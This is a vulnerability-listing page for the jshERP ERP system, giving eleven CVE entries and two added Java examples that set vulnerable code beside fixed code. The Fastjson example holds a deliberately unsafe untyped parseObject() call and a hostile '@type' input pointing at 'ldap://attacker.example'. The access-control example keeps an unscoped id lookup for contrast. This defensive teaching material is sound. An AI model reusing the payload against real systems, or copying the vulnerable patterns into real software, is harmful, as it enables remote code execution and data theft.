jshERP
by jshERP
Source repositories
CVEs (31)
| CVE | Risk | CVSS | EPSS | Published | Description |
|---|---|---|---|---|---|
| CVE-2025-51744 | 0.00 | — | 0.00 | Nov 25, 2025 | An issue was discovered in jishenghua JSH_ERP 2.3.1. The /user/addUser endpoint is vulnerable to fastjson deserialization attacks. |
| CVE-2025-51742 | 0.00 | — | 0.00 | Nov 25, 2025 | An issue was discovered in jishenghua JSH_ERP 2.3.1. The /material/getMaterialEnableSerialNumberList endpoint passes the search query parameter directly to parseObject(), introducing a Fastjson deserialization vulnerability that can lead to RCE via JDBC payloads. |
| CVE-2025-51745 | 0.00 | — | 0.00 | Nov 25, 2025 | An issue was discovered in jishenghua JSH_ERP 2.3.1. The /role/addcan endpoint is vulnerable to fastjson deserialization attacks. |
| CVE-2025-51746 | 0.00 | — | 0.00 | Nov 25, 2025 | An issue was discovered in jishenghua JSH_ERP 2.3.1. The /serialNumber/addSerialNumber endpoint is vulnerable to fastjson deserialization attacks. |
| CVE-2025-60800 | 0.00 | — | 0.00 | Oct 28, 2025 | Incorrect access control in the /jshERP-boot/user/info interface of jshERP up to commit 90c411a allows attackers to access sensitive information via a crafted GET request. |
| CVE-2025-60801 | 0.00 | — | 0.00 | Oct 24, 2025 | jshERP up to commit fbda24da was discovered to contain an unauthenticated remote code execution (RCE) vulnerability via the jsh_erp function. |
| CVE-2025-55371 | 0.00 | — | 0.00 | Aug 21, 2025 | Incorrect access control in the component /controller/PersonController.java of jshERP v3.5 allows unauthorized attackers to obtain all the information of the handler by executing the getAllList method. |
| CVE-2025-55366 | 0.00 | — | 0.00 | Aug 21, 2025 | Incorrect access control in the component /controller/UserController.java of jshERP v3.5 allows attackers to arbitrarily reset user account passwords and execute a horizontal privilege escalation attack. |
| CVE-2025-55370 | 0.00 | — | 0.00 | Aug 21, 2025 | Incorrect access control in the component /controller/ResourceController.java of jshERP v3.5 allows unauthorized attackers to obtain all the corresponding ID data by modifying the ID value. |
| CVE-2025-55368 | 0.00 | — | 0.00 | Aug 21, 2025 | Incorrect access control in the component /controller/RoleController.java of jshERP v3.5 allows unauthorized attackers to arbitrarily modify the supplier status under any account. |
| CVE-2025-55367 | 0.00 | — | 0.00 | Aug 21, 2025 | Incorrect access control in the component /controller/SupplierController.java of jshERP v3.5 allows unauthorized attackers to arbitrarily modify the supplier status under any account. |
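The CVE-2025-51742 entry describes a request parameter handed straight to Fastjson's parseObject(). The following is an added example, not code from jshERP or from the advisory: it shows that untyped parse beside a hardened version that binds to a concrete class, caps input size and switches Fastjson's safeMode on. The endpoint, the MaterialSearch class and its fields, and the placeholder gadget class name in the hostile input are all hypothetical.

```java
// Added example, not jshERP's code: the pattern the CVE-2025-51742 description gives
// (a request parameter handed straight to Fastjson's parseObject()) next to a hardened
// version. Class and field names here are hypothetical.
import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.JSONException;
import com.alibaba.fastjson.JSONObject;
import com.alibaba.fastjson.parser.ParserConfig;

public class FastjsonSearchParam {

    /** Typed target for the "search" parameter: only these fields can ever be populated. */
    public static class MaterialSearch {
        public String materialParam;  // free-text filter
        public Long depotId;          // warehouse id
    }

    /** Vulnerable shape: untyped parse of attacker-controlled text. */
    static JSONObject parseSearchUnsafe(String search) {
        // If AutoType is reachable, an "@type" key lets the caller choose the class that is
        // instantiated, e.g. a JDBC DataSource whose connection string points at a host the
        // attacker controls. That is the "RCE via JDBC payloads" path the advisory refers to.
        return JSON.parseObject(search);
    }

    /** Hardened shape: global AutoType kill switch, bounded input, typed target. */
    static MaterialSearch parseSearchSafe(String search) {
        if (search == null || search.isEmpty()) {
            return new MaterialSearch();
        }
        if (search.length() > 4096) {
            throw new IllegalArgumentException("search parameter too long");
        }
        // Binding to a concrete class means unknown keys are ignored and no class name from
        // the input is resolved; with safeMode on, an "@type" key is rejected outright.
        return JSON.parseObject(search, MaterialSearch.class);
    }

    static {
        // Fastjson 1.2.68+: disables AutoType for every parse in the process, independent
        // of the accept/deny lists. Do this once at application startup.
        ParserConfig.getGlobalInstance().setSafeMode(true);
    }

    public static void main(String[] args) {
        String benign = "{\"materialParam\":\"bolt\",\"depotId\":3}";
        MaterialSearch ok = parseSearchSafe(benign);
        System.out.println("materialParam=" + ok.materialParam + " depotId=" + ok.depotId);

        // Constructed hostile input; "com.example.Gadget" is a placeholder, not a real class.
        String hostile = "{\"@type\":\"com.example.Gadget\","
                + "\"dataSourceName\":\"ldap://attacker.example/x\"}";
        try {
            parseSearchSafe(hostile);
            System.out.println("hostile input parsed; safeMode is not in effect");
        } catch (JSONException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

The typed parse is the structural fix; safeMode is the process-wide backstop for every other parseObject() call in the application, including the three other endpoints listed above. Checking the input for the substring "@type" is not a substitute for either, since Fastjson decodes escaped keys before matching them.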
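The CVE-2025-55366 and CVE-2025-55370 entries describe the same defect in two forms: a row selected by a client-supplied id alone, and a password reset that does not check who the target belongs to. The following is an added example, not code from jshERP: it shows an unscoped lookup beside a tenant-scoped one and a reset that requires the target to be the caller's own account or a tenant admin's subordinate. The Principal, Resource and User classes, the in-memory store and the sample rows are all hypothetical.

```java
// Added example, not jshERP's code: the access-control pattern behind the
// "modify the ID value" and "reset user account passwords" entries, shown as an
// unscoped lookup beside a tenant-scoped one. All names and data are hypothetical.
import java.util.HashMap;
import java.util.Map;

public class TenantScopedAccess {

    /** Who is calling: taken from the verified session or token, never from request parameters. */
    static final class Principal {
        final long userId; final long tenantId; final boolean tenantAdmin;
        Principal(long userId, long tenantId, boolean tenantAdmin) {
            this.userId = userId; this.tenantId = tenantId; this.tenantAdmin = tenantAdmin;
        }
    }

    static final class Resource {
        final long id; final long tenantId; final String data;
        Resource(long id, long tenantId, String data) {
            this.id = id; this.tenantId = tenantId; this.data = data;
        }
    }

    static final class User {
        final long id; final long tenantId; String passwordHash;
        User(long id, long tenantId, String passwordHash) {
            this.id = id; this.tenantId = tenantId; this.passwordHash = passwordHash;
        }
    }

    private final Map<Long, Resource> resources = new HashMap<>();
    private final Map<Long, User> users = new HashMap<>();

    /** Vulnerable shape: the row is selected by id alone, so any caller can walk every id. */
    Resource getResourceUnscoped(long id) {
        return resources.get(id);
    }

    /** Fixed shape: tenant is part of the lookup; a foreign id is reported exactly like a missing one. */
    Resource getResourceScoped(Principal caller, long id) {
        Resource r = resources.get(id);
        if (r == null || r.tenantId != caller.tenantId) {
            throw new SecurityException("resource not found");
        }
        return r;
    }

    /** Fixed password reset: same tenant, and either the account owner or a tenant admin. */
    boolean resetPassword(Principal caller, long targetUserId, String newPasswordHash) {
        User target = users.get(targetUserId);
        if (target == null || target.tenantId != caller.tenantId) {
            return false;
        }
        if (caller.userId != targetUserId && !caller.tenantAdmin) {
            return false;
        }
        target.passwordHash = newPasswordHash;
        return true;
    }

    public static void main(String[] args) {
        TenantScopedAccess store = new TenantScopedAccess();
        // Constructed sample data: two tenants, one resource and one user each.
        store.resources.put(1L, new Resource(1, 100, "tenant 100 record"));
        store.resources.put(2L, new Resource(2, 200, "tenant 200 record"));
        store.users.put(10L, new User(10, 100, "hash-10"));
        store.users.put(20L, new User(20, 200, "hash-20"));

        Principal alice = new Principal(10, 100, false);   // ordinary user in tenant 100

        // The unscoped lookup hands alice a row that belongs to tenant 200.
        System.out.println("unscoped: " + store.getResourceUnscoped(2).data);
        System.out.println("scoped own: " + store.getResourceScoped(alice, 1).data);
        try {
            store.getResourceScoped(alice, 2);
        } catch (SecurityException e) {
            System.out.println("scoped foreign: " + e.getMessage());
        }
        System.out.println("reset foreign user: " + store.resetPassword(alice, 20, "new"));
        System.out.println("reset self: " + store.resetPassword(alice, 10, "new"));
    }
}
```

Two details carry over to a real controller: the tenant and user identity must come from the authenticated session, not from a request field that the client can edit, and the scoped lookup should be the only query path so a missing check cannot be reintroduced per endpoint. Returning the same "not found" for a foreign id as for a nonexistent one also stops an attacker from enumerating which ids exist in other accounts.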
Page 2 of 2